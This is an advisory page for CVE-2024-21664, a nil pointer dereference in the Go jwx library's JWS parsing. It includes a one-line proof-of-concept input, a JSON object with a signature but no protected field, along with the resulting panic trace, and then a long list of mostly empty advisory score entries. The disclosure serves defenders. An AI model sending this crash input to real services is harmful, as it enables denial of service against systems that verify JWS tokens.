CVE-2024-21664
ADVISORY - githubSummary
Summary
Calling jws.Parse with a JSON serialized payload where the signature field is present while protected is absent can lead to a nil pointer dereference.
Details
This seems to also affect other functions that calls Parse internally, like jws.Verify.
My understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.
Based on the stack trace in the PoC, the issue seems to be that the processing done in jws/message.go:UnmarshalJSON() assumes that if a signature field is present, then a protected field is also present. If this is not the case, then the subsequent call to getB64Value(sig.protected) will dereference sig.protected, which is nil.
PoC
Reproducer:
package poc
import (
"testing"
"github.com/lestrrat-go/jwx/v2/jws"
)
func TestPOC(t *testing.T) {
_, _ = jws.Parse([]byte(`{"signature": ""}`))
}
Result:
$ go test
--- FAIL: TestPOC (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]
goroutine 6 [running]:
testing.tRunner.func1.2({0x628800, 0x831030})
/usr/local/go/src/testing/testing.go:1545 +0x238
testing.tRunner.func1()
/usr/local/go/src/testing/testing.go:1548 +0x397
panic({0x628800?, 0x831030?})
/usr/local/go/src/runtime/panic.go:914 +0x21f
github.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:484 +0x18
github.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/message.go:323 +0x4ad
encoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})
/usr/local/go/src/encoding/json/decode.go:604 +0x6cc
encoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})
/usr/local/go/src/encoding/json/decode.go:374 +0x3e
encoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})
/usr/local/go/src/encoding/json/decode.go:181 +0x133
encoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})
/usr/local/go/src/encoding/json/stream.go:73 +0x179
github.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/internal/json/json.go:26 +0x97
github.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:588 +0x50
github.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:525 +0x89
poc.TestPOC(0x0?)
/home/fredrik/src/jwx_poc/poc_test.go:10 +0x57
testing.tRunner(0xc0000e4340, 0x68ef30)
/usr/local/go/src/testing/testing.go:1595 +0xff
created by testing.(*T).Run in goroutine 1
/usr/local/go/src/testing/testing.go:1648 +0x3ad
exit status 2
FAIL poc 0.005s
Impact
The vulnerability can be used to crash / DOS a system doing JWS verification.
EPSS Score: 0.00178 (0.396)
Common Weakness Enumeration (CWE)
ADVISORY - nist
NULL Pointer Dereference
ADVISORY - github
NULL Pointer Dereference
ADVISORY - gitlab
ADVISORY - redhat
NULL Pointer Dereference
NIST
CREATED
UPDATED
ADVISORY IDCVE-2024-21664
EXPLOITABILITY SCORE
2.8
EXPLOITS FOUND
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
4.3mediumGitHub
CREATED
UPDATED
ADVISORY IDGHSA-pvcr-v8j8-j5q3
EXPLOITABILITY SCORE
2.8
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
4.3mediumGoLang
CREATED
UPDATED
ADVISORY IDGO-2024-2454
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Red Hat
CREATED
UPDATED
ADVISORY IDCVE-2024-21664
EXPLOITABILITY SCORE
3.9
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CVSS SCORE
7.5mediumChainguard
CREATED
UPDATED
ADVISORY ID
CGA-2hmw-5x4m-2cqg
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-373g-57qg-xxx4
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-3hmh-6hmr-cg6g
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-3p3g-cgmf-q7jr
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-3pp9-f8mv-3662
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-3pwf-85g3-7hwx
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-4cv5-4r6g-v48v
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-4h4f-7c26-wph6
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-4jxf-wcrx-p97c
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-54p3-g93g-w3gh
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-55fg-w2x9-5959
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-57v2-mmmr-jq8g
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-5f62-fvxx-5fvh
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-96jc-4g66-92pf
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-g2wx-wqp3-m77w
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-hj5p-q245-hx5j
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-hj99-38vq-hf2x
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-hx64-r6pw-g756
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-jfrc-jjm2-6m26
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-jwf8-589j-v6hx
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-pc95-j683-rw5m
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-rg2f-wh8h-jrh5
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-rjc7-4vhw-626h
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-rpgf-46xv-22fc
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-rv75-x49x-qg7v
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-vcf8-vmw8-5h5m
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-vj65-w6g4-3hxv
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-w2v2-x5jw-cm43
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-wcq8-xq83-7jc4
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-wrc3-34rr-5v3r
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-wxgp-q82w-qf4j
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
Chainguard
CREATED
UPDATED
ADVISORY ID
CGA-wxvj-jgxc-w3x5
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
intheWild
CREATED
UPDATED
ADVISORY IDCVE-2024-21664
EXPLOITABILITY SCORE
-
EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-